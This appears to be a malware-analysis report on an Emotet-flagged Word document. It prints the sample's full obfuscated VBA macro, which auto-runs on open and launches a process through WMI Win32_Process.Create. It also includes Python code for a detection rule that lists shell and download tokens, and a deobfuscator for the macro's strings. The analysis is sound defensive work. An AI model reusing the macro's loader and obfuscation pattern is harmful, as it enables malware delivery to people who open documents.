Verdict: MALICIOUS
Risk score: 172

Heuristics (7)
- ClamAV: Doc.Downloader.EmotetRed02224-9938637-0 [critical] (CLAMAV_DETECTION)
  ClamAV detected this file as malware: Doc.Downloader.EmotetRed02224-9938637-0
- VBA macros detected [medium] (OLE_VBA_MACROS; 3 related findings)
  Document contains VBA macro code
- CreateObject call [high] (OLE_VBA_CREATEOBJ)
  Matched line in script: Set Fcqv6woostm0 = CreateObject(H4qcty67722xqmrmn)
- VBA p-code auto-exec with execution tokens [high] (OLE_VBA_PCODE_AUTOEXEC_EXEC)
  Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it; it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the finding's detail line (not reproduced in this extract).
- Document_Open macro [low] (OLE_VBA_DOCOPEN)
  Matched line in script: Private Sub Document_open()
- Suspicious extracted artifact [info] (EXTRACTED_FILE_STATIC_TRIAGE)
  One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL [info] (EMBEDDED_URL)
  One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body). This is the standard DrawingML XML namespace found in ordinary Office files; treat it as noise, not as a network indicator for this sample.
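The OLE_VBA_PCODE_AUTOEXEC_EXEC rule above is a co-occurrence check, so it is easy to get subtly wrong (firing on either token alone, or matching Shell inside PowerShell). The following is an added example, not the analyzer's own code: a minimal re-implementation of the pairing rule run over constructed sample streams. The two token lists are exactly the ones the finding names; the function names, the word-boundary matching and the three sample inputs are this example's own assumptions. A production version would take its tokens from the decompiled p-code stream (for instance pcodedmp output) rather than from plain source text; here the input is plain text so the example runs offline.

```python
"""Pairing heuristic: auto-exec entry point AND execution token in one stream."""
import re

# Token lists as named in the OLE_VBA_PCODE_AUTOEXEC_EXEC finding.
AUTOEXEC_TOKENS = ("Auto_Open", "AutoOpen", "Document_Open", "Workbook_Open",
                   "Auto_Close", "AutoClose")
EXEC_TOKENS = ("Shell", "CreateObject", "GetObject", "PowerShell", "cmd.exe",
               "URLDownloadToFile", "WinHttp", "XMLHTTP", "ADODB.Stream",
               "ShellExecute", "ExecuteExcel4Macro")


def _find_tokens(stream: str, tokens) -> list:
    """Return the tokens present in `stream`, matched case-insensitively.

    Identifier-like tokens are matched on word boundaries so that 'Shell'
    does not fire on 'PowerShell' or 'ShellExecute'; tokens containing a dot
    (cmd.exe, ADODB.Stream) are matched literally.
    """
    found = []
    for tok in tokens:
        pat = re.escape(tok) if "." in tok else r"\b" + re.escape(tok) + r"\b"
        if re.search(pat, stream, re.IGNORECASE):
            found.append(tok)
    return found


def pcode_autoexec_exec(stream: str) -> dict:
    """Apply the pairing rule to one compiled VBA / cache stream given as text.

    Fires only when BOTH an auto-exec entry point AND an execution token are
    present; the matched tokens are returned so a detail line can name them.
    """
    auto = _find_tokens(stream, AUTOEXEC_TOKENS)
    exe = _find_tokens(stream, EXEC_TOKENS)
    return {"fired": bool(auto) and bool(exe), "autoexec": auto, "exec": exe}


# Constructed sample streams (the page does not show the sample's p-code).
# The first mirrors the two matched lines the report does show.
SAMPLE_PAIRED = (
    "Private Sub Document_open()\nJotxu6biv0471oy0\nEnd Sub\n"
    "Set Fcqv6woostm0 = CreateObject(H4qcty67722xqmrmn)\n"
)
SAMPLE_AUTOEXEC_ONLY = 'Private Sub Document_Open()\nMsgBox "hello"\nEnd Sub\n'
SAMPLE_EXEC_ONLY = (
    'Sub Helper()\nSet o = CreateObject("Scripting.FileSystemObject")\nEnd Sub\n'
)

if __name__ == "__main__":
    for name, s in (("paired", SAMPLE_PAIRED),
                    ("autoexec-only", SAMPLE_AUTOEXEC_ONLY),
                    ("exec-only", SAMPLE_EXEC_ONLY)):
        print(name, pcode_autoexec_exec(s))
```

Only the first sample fires; the other two contain one half of the pair each and stay quiet, which is the property the finding text describes.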
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 8250 bytes |

SHA-256: 2cdc245404bd91793507e2ad809b7a2ef368477f6d691e184ece3a4f067eabcc

Detection
- ClamAV: No threats found
- Obfuscation or payload: likely. 123 of 199 identifiers look randomly generated (e.g. 'Xhlj9irufb65_wekzf'), consistent with name-mangling obfuscation.
Preview script (first 1,000 lines of the extracted script)

Analyst note: olevba concatenates all VBA modules, so each Attribute VB_Name line below starts another module (the ThisDocument class Xlb0g5eyj545, an empty module Bt08uhxu1tnhy1, and the module Xhlj9irufb65_wekzf that holds the logic). Every GoTo jumps over a block of dead code (file opens on F:\ and O:\ paths) to the label that follows it, so the live path is only the handful of statements at the labels: build a string from the "]b2[s"-padded fragments, strip the padding in Jumkzxvtzz2s via Replace (the replacement argument Dh8iwtx_gbrodi is never assigned, so it is empty), pass the result to CreateObject, then call .Create on that object with a second string taken from the document body (StoryRanges.Item(1), with the first four characters dropped by Mid). The command line therefore lives in the document text, not in the macro, and is not part of this extract.

```vba
Attribute VB_Name = "Xlb0g5eyj545"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
Jotxu6biv0471oy0
End Sub
Attribute VB_Name = "Bt08uhxu1tnhy1"
Attribute VB_Name = "Xhlj9irufb65_wekzf"
Function Jotxu6biv0471oy0()
On Error Resume Next
mKbjhqs = Xlb0g5eyj545.StoryRanges.Item(244 / 244)
GoTo aMSHGI
Dim VWDNpuI() As Byte
Dim FmdzUop As Integer
FmdzUop = FreeFile
Open "F:\emayA\cEXRoDjH\VwIACIE.cAhxFlQk" For Binary Access Read As #FmdzUop
Open "O:\vzKFL\xTplfDEO\UzdPBJhtk.FxjwCGqT" For Binary Access Read As #FmdzUop
ReDim VWDNpuI(1 To LOF(intGend) - 5)
Get #FmdzUop, , VWDNpuI
Get #FmdzUop, , VWDNpuI
Get #FmdzUop, , VWDNpuI
Close #FmdzUop
aMSHGI:
snahbsd = "]b2[sp]b2[s"
Mvmowvl61pq1 = "]b2[sro]b2[s]b2[sce]b2[ss]b2[ss]b2[s]b2[s"
GoTo BaaeH
Dim GEdfI() As Byte
Dim HHIaF As Integer
HHIaF = FreeFile
Open "F:\JJhGoHJAy\mhYgHAECB\ScIqGCAp.sgqtGoGFB" For Binary Access Read As #HHIaF
Open "O:\skwqjIHSw\BGDBEtNI\SVgGCDCe.oeVOIAwo" For Binary Access Read As #HHIaF
ReDim GEdfI(1 To LOF(intGend) - 5)
Get #HHIaF, , GEdfI
Get #HHIaF, , GEdfI
Get #HHIaF, , GEdfI
Close #HHIaF
BaaeH:
W_z0xk65anh723p = "]b2[s:w]b2[s]b2[sin]b2[s3]b2[s2]b2[s_]b2[s"
GoTo QrZrL
Dim sIjWJBH() As Byte
Dim jKkUJJZ As Integer
jKkUJJZ = FreeFile
Open "F:\MIXPEQq\xrgAtKF\wbeXEF.fMufiCa" For Binary Access Read As #jKkUJJZ
Open "O:\gtNTBHAA\pRTARkP\omJGJZDcR.TSCsY" For Binary Access Read As #jKkUJJZ
ReDim sIjWJBH(1 To LOF(intGend) - 5)
Get #jKkUJJZ, , sIjWJBH
Get #jKkUJJZ, , sIjWJBH
Get #jKkUJJZ, , sIjWJBH
Close #jKkUJJZ
QrZrL:
Bcu4d7izwi5q = "w]b2[sin]b2[sm]b2[sgm]b2[st]b2[s]b2[s"
GoTo zDLxpKAFE
Dim PFNPd() As Byte
Dim nBVGMJ As Integer
nBVGMJ = FreeFile
Open "F:\KzjhHR\fTZqG\WLFeZHJ.RQtHHgTHi" For Binary Access Read As #nBVGMJ
Open "O:\xfHgsuZ\OuWcHBRFs\aVDcAfBmF.wxMQaJA" For Binary Access Read As #nBVGMJ
ReDim PFNPd(1 To LOF(intGend) - 5)
Get #nBVGMJ, , PFNPd
Get #nBVGMJ, , PFNPd
Get #nBVGMJ, , PFNPd
Close #nBVGMJ
zDLxpKAFE:
Md7uay_rjhi = "]b2[ss]b2[s"
GoTo OuPbAWEJB
Dim KnLfUEp() As Byte
Dim abJXtUnJ As Integer
abJXtUnJ = FreeFile
Open "F:\qyUZgDN\BGtxCFHH\NTfeA.DExaE" For Binary Access Read As #abJXtUnJ
Open "O:\aIUpFwC\nTpvYbID\cOpRCH.yenkEdEBG" For Binary Access Read As #abJXtUnJ
ReDim KnLfUEp(1 To LOF(intGend) - 5)
Get #abJXtUnJ, , KnLfUEp
Get #abJXtUnJ, , KnLfUEp
Get #abJXtUnJ, , KnLfUEp
Close #abJXtUnJ
OuPbAWEJB:
C_tmpi32le9 = Bcu4d7izwi5q + Md7uay_rjhi + W_z0xk65anh723p + snahbsd + Mvmowvl61pq1
GoTo uwrli
Dim KcYzD() As Byte
Dim DLbwIFKRv As Integer
DLbwIFKRv = FreeFile
Open "F:\BokkBJR\JVqtTl\wBdFDGCm.csxtJBIHA" For Binary Access Read As #DLbwIFKRv
Open "O:\zDxufIC\iCExC\ZRtuVA.YMVmJ" For Binary Access Read As #DLbwIFKRv
ReDim KcYzD(1 To LOF(intGend) - 5)
Get #DLbwIFKRv, , KcYzD
Get #DLbwIFKRv, , KcYzD
Get #DLbwIFKRv, , KcYzD
Close #DLbwIFKRv
uwrli:
H4qcty67722xqmrmn = Lehj73snaqzhyepdw9(C_tmpi32le9)
GoTo JpnbIUF
Dim jLIIJFE() As Byte
Dim GigmCE As Integer
GigmCE = FreeFile
Open "F:\tzCMq\XMchB\YUPCDfDKL.EffNJq" For Binary Access Read As #GigmCE
Open "O:\ZGlzCsC\TtOjBxE\gAFGG.ByczYWAGo" For Binary Access Read As #GigmCE
ReDim jLIIJFE(1 To LOF(intGend) - 5)
Get #GigmCE, , jLIIJFE
Get #GigmCE, , jLIIJFE
Get #GigmCE, , jLIIJFE
Close #GigmCE
JpnbIUF:
Set Fcqv6woostm0 = CreateObject(H4qcty67722xqmrmn)
GoTo OstReD
Dim HXWoFCJP() As Byte
Dim gGHPnUA As Integer
gGHPnUA = FreeFile
Open "F:\yhIgJCIMF\qsJDB\PptZC.VCOUrPxF" For Binary Access Read As #gGHPnUA
Open "O:\cRwnDC\zYXqog\gNodA.UMeMIyH" For Binary Access Read As #gGHPnUA
ReDim HXWoFCJP(1 To LOF(intGend) - 5)
Get #gGHPnUA, , HXWoFCJP
Get #gGHPnUA, , HXWoFCJP
Get #gGHPnUA, , HXWoFCJP
Close #gGHPnUA
OstReD:
Ma9hdg7q365lpb = Mid(mKbjhqs, (2 + 3), Len(mKbjhqs))
GoTo XRvZBDBD
Dim nTckscaDq() As Byte
Dim pYTRxECC As Integer
pYTRxECC = FreeFile
Open "F:\SVdfFCU\nnqUrp\YWmSNHII.kFjgBgDk" For Binary Access Read As #pYTRxECC
Open "O:\NCeDGUAx\liGyAIZj\lUyiD.VfSxEM" For Binary Access Read As #pYTRxECC
ReDim nTckscaDq(1 To LOF(intGend) - 5)
Get #pYTRxECC, , nTckscaDq
Get #pYTRxECC, , nTckscaDq
Get #pYTRxECC, , nTckscaDq
Close #pYTRxECC
XRvZBDBD:
GoTo oMoXwHAi
Dim HNtcACoR() As Byte
Dim zaZqi As Integer
zaZqi = FreeFile
Open "F:\nByRqYG\TFriHa\TImuB.vzTdgVSJ" For Binary Access Read As #zaZqi
Open "O:\OoAuHBF\TrVff\lRegJKh.zDCEsFDJE" For Binary Access Read As #zaZqi
ReDim HNtcACoR(1 To LOF(intGend) - 5)
Get #zaZqi, , HNtcACoR
Get #zaZqi, , HNtcACoR
Get #zaZqi, , HNtcACoR
Close #zaZqi
oMoXwHAi:
Fcqv6woostm0.Create Lehj73snaqzhyepdw9(Ma9hdg7q365lpb), Ndofzqkqt8o8ky4, Es2mklc5pr30boja
GoTo vSgqJI
Dim uqjqkyHX() As Byte
Dim ovskCI As Integer
ovskCI = FreeFile
Open "F:\UkqzBHD\AfilMCw\FaEXXAH.VJBQHBwD" For Binary Access Read As #ovskCI
Open "O:\uYQKM\KtKdHCsGD\lkgPV.CtEPFIa" For Binary Access Read As #ovskCI
ReDim uqjqkyHX(1 To LOF(intGend) - 5)
Get #ovskCI, , uqjqkyHX
Get #ovskCI, , uqjqkyHX
Get #ovskCI, , uqjqkyHX
Close #ovskCI
vSgqJI:
GoTo iNgaE
Dim DCGxZIHE() As Byte
Dim FELuBTD As Integer
FELuBTD = FreeFile
Open "F:\AlLTF\KjklIF\ZbOCaDfmF.zRWqJ" For Binary Access Read As #FELuBTD
Open "O:\CSYaI\BeKGII\ISlAUHBA.hUrieDEBA" For Binary Access Read As #FELuBTD
ReDim DCGxZIHE(1 To LOF(intGend) - 5)
Get #FELuBTD, , DCGxZIHE
Get #FELuBTD, , DCGxZIHE
Get #FELuBTD, , DCGxZIHE
Close #FELuBTD
iNgaE:
End Function
Function Lehj73snaqzhyepdw9(Wft58t8kair)
On Error Resume Next
GoTo WvseC
Dim pKryCIHFC() As Byte
Dim GvYvntR As Integer
GvYvntR = FreeFile
Open "F:\CmcVFs\XishGzBCo\hcyLYIRH.wmCZaBADB" For Binary Access Read As #GvYvntR
Open "O:\QYYEIdD\lneIGGHdk\tPJGEIe.xXBLI" For Binary Access Read As #GvYvntR
ReDim pKryCIHFC(1 To LOF(intGend) - 5)
Get #GvYvntR, , pKryCIHFC
Get #GvYvntR, , pKryCIHFC
Get #GvYvntR, , pKryCIHFC
Close #GvYvntR
WvseC:
Gybrsxbkupnb96n = (Wft58t8kair)
GoTo DtPcJVH
Dim LveTGO() As Byte
Dim CMVnWpNGG As Integer
CMVnWpNGG = FreeFile
Open "F:\LvKnA\BOtUEZATF\XZQseKaFA.wNmzM" For Binary Access Read As #CMVnWpNGG
Open "O:\rueRG\VzWpbFH\IjzjDqRCA.NfKzekAB" For Binary Access Read As #CMVnWpNGG
ReDim LveTGO(1 To LOF(intGend) - 5)
Get #CMVnWpNGG, , LveTGO
Get #CMVnWpNGG, , LveTGO
Get #CMVnWpNGG, , LveTGO
Close #CMVnWpNGG
DtPcJVH:
Htqq1guc2d740 = Jumkzxvtzz2s(Gybrsxbkupnb96n)
GoTo VSmdWBCHE
Dim TOmTI() As Byte
Dim IyJitF As Integer
IyJitF = FreeFile
Open "F:\rRIMGI\pwZWJ\AvgVBxG.OaxnnLJb" For Binary Access Read As #IyJitF
Open "O:\vzest\bkKRAHG\viWaCHFyl.borAIDhH" For Binary Access Read As #IyJitF
ReDim TOmTI(1 To LOF(intGend) - 5)
Get #IyJitF, , TOmTI
Get #IyJitF, , TOmTI
Get #IyJitF, , TOmTI
Close #IyJitF
VSmdWBCHE:
Lehj73snaqzhyepdw9 = Htqq1guc2d740
GoTo qQuwLC
Dim erxovx() As Byte
Dim FRpvMrG As Integer
FRpvMrG = FreeFile
Open "F:\bdvnDGG\YcExI\ktRsYELAd.fmxbB" For Binary Access Read As #FRpvMrG
Open "O:\hTNkC\vnsiEILT\lOvmX.DAaIToDF" For Binary Access Read As #FRpvMrG
ReDim erxovx(1 To LOF(intGend) - 5)
Get #FRpvMrG, , erxovx
Get #FRpvMrG, , erxovx
Get #FRpvMrG, , erxovx
Close #FRpvMrG
qQuwLC:
End Function
Function Jumkzxvtzz2s(Fuws4dl87mo)
Mjjc2_q8vgjc36 = G9cdtgijbhc3ewc
GoTo OkxlX
Dim XUiHBHHUH() As Byte
Dim VGYhDjxf As Integer
VGYhDjxf = FreeFile
Open "F:\KqqRCCD\OxxrCn\eQUMRH.ZdxMJ" For Binary Access Read As #VGYhDjxf
Open "O:\ikJcU\cGIxAAG\fEBwJJ.UFkBBLGk" For Binary Access Read As #VGYhDjxf
ReDim XUiHBHHUH(1 To LOF(intGend) - 5)
Get #VGYhDjxf, , XUiHBHHUH
Get #VGYhDjxf, , XUiHBHHUH
Get #VGYhDjxf, , XUiHBHHUH
Close #VGYhDjxf
OkxlX:
Jumkzxvtzz2s = Replace(Fuws4dl87mo, "]b2[s", Dh8iwtx_gbrodi)
GoTo XDAaIBnI
Dim YVAKAT() As Byte
Dim yhCeYdDx As Integer
yhCeYdDx = FreeFile
Open "F:\KrczWMd\cxBwEA\spjtC.VvknDGZ" For Binary Access Read As #yhCeYdDx
Open "O:\VoJkkBWBC\NcgoF\KcMVOEFe.igOXKnIU" For Binary Access Read As #yhCeYdDx
ReDim YVAKAT(1 To LOF(intGend) - 5)
Get #yhCeYdDx, , YVAKAT
Get #yhCeYdDx, , YVAKAT
Get #yhCeYdDx, , YVAKAT
Close #yhCeYdDx
XDAaIBnI:
End Function
```
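The obfuscation in the preview is a single substitution: fragments padded with the marker "]b2[s" are concatenated, then Replace() strips the marker. That can be resolved statically without running the macro. The following is an added example, not the analyzer's or the sample's code, that does so over the live statements copied from the preview above. The helper names, the regexes and the constructed document-body string are this example's own assumptions; the real document body is not part of this extract, so the body decoder is only shown on a placeholder.

```python
"""Static resolution of the ']b2[s' string obfuscation in the extracted macro."""
import re

# Live statements copied from the macro preview. The dead-code blocks that sit
# between each GoTo and its label never execute and are omitted here.
MACRO_EXCERPT = r'''
snahbsd = "]b2[sp]b2[s"
Mvmowvl61pq1 = "]b2[sro]b2[s]b2[sce]b2[ss]b2[ss]b2[s]b2[s"
W_z0xk65anh723p = "]b2[s:w]b2[s]b2[sin]b2[s3]b2[s2]b2[s_]b2[s"
Bcu4d7izwi5q = "w]b2[sin]b2[sm]b2[sgm]b2[st]b2[s]b2[s"
Md7uay_rjhi = "]b2[ss]b2[s"
C_tmpi32le9 = Bcu4d7izwi5q + Md7uay_rjhi + W_z0xk65anh723p + snahbsd + Mvmowvl61pq1
H4qcty67722xqmrmn = Lehj73snaqzhyepdw9(C_tmpi32le9)
Set Fcqv6woostm0 = CreateObject(H4qcty67722xqmrmn)
Jumkzxvtzz2s = Replace(Fuws4dl87mo, "]b2[s", Dh8iwtx_gbrodi)
'''

STR_ASSIGN = re.compile(r'^\s*(\w+)\s*=\s*"([^"]*)"\s*$')
CONCAT_ASSIGN = re.compile(r'^\s*(\w+)\s*=\s*((?:\w+\s*\+\s*)+\w+)\s*$')
REPLACE_CALL = re.compile(r'Replace\(\s*\w+\s*,\s*"([^"]*)"\s*,\s*(\w+)\s*\)')


def resolve_strings(vba: str) -> dict:
    """Evaluate string literal assignments and '+' concatenations in source order."""
    env = {}
    for line in vba.splitlines():
        m = STR_ASSIGN.match(line)
        if m:
            env[m.group(1)] = m.group(2)
            continue
        m = CONCAT_ASSIGN.match(line)
        if m:
            parts = [p.strip() for p in m.group(2).split("+")]
            # An unknown name is an empty Variant in VBA without Option Explicit.
            env[m.group(1)] = "".join(env.get(p, "") for p in parts)
    return env


def marker_from_replace(vba: str, env: dict) -> tuple:
    """Recover the junk marker and its replacement from the Replace() call.

    The replacement variable (Dh8iwtx_gbrodi in the sample) is never assigned,
    so it is an empty Variant and Replace() simply deletes the marker.
    """
    m = REPLACE_CALL.search(vba)
    marker, repl_name = m.group(1), m.group(2)
    return marker, env.get(repl_name, "")


def decode(value: str, marker: str, replacement: str = "") -> str:
    """Emulate Jumkzxvtzz2s: Replace(value, marker, replacement)."""
    return value.replace(marker, replacement)


def trace_createobject(vba: str) -> str:
    """Resolve the string passed to CreateObject by following assignments back."""
    env = resolve_strings(vba)
    marker, repl = marker_from_replace(vba, env)
    obj_arg = re.search(r"CreateObject\(\s*(\w+)\s*\)", vba).group(1)
    # obj_arg = Wrapper(x): the wrapper ends in Replace(), so decode env[x].
    inner = re.search(r"^\s*%s\s*=\s*\w+\(\s*(\w+)\s*\)" % re.escape(obj_arg),
                      vba, re.M).group(1)
    return decode(env[inner], marker, repl)


def decode_document_body(body: str, marker: str) -> str:
    """Emulate Mid(body, 5, Len(body)) followed by the same Replace(): the macro
    drops the first four characters of StoryRanges.Item(1) and strips the marker.
    The real body is not in this extract; callers pass a placeholder."""
    return decode(body[4:], marker)


if __name__ == "__main__":
    print("CreateObject argument:", trace_createobject(MACRO_EXCERPT))
    # Constructed placeholder body, not the sample's real document text.
    print("body decode demo:", decode_document_body("abcd]b2[sex]b2[sam]b2[sple", "]b2[s"))
```

Resolving the excerpt yields the moniker winmgmts:win32_process for CreateObject, so the following .Create call is WMI Win32_Process.Create with a command line that the macro reads from the document body and passes through the same marker-stripping routine. That is why the macro text alone contains no URL or command: the second stage has to be recovered from the document text of the original sample.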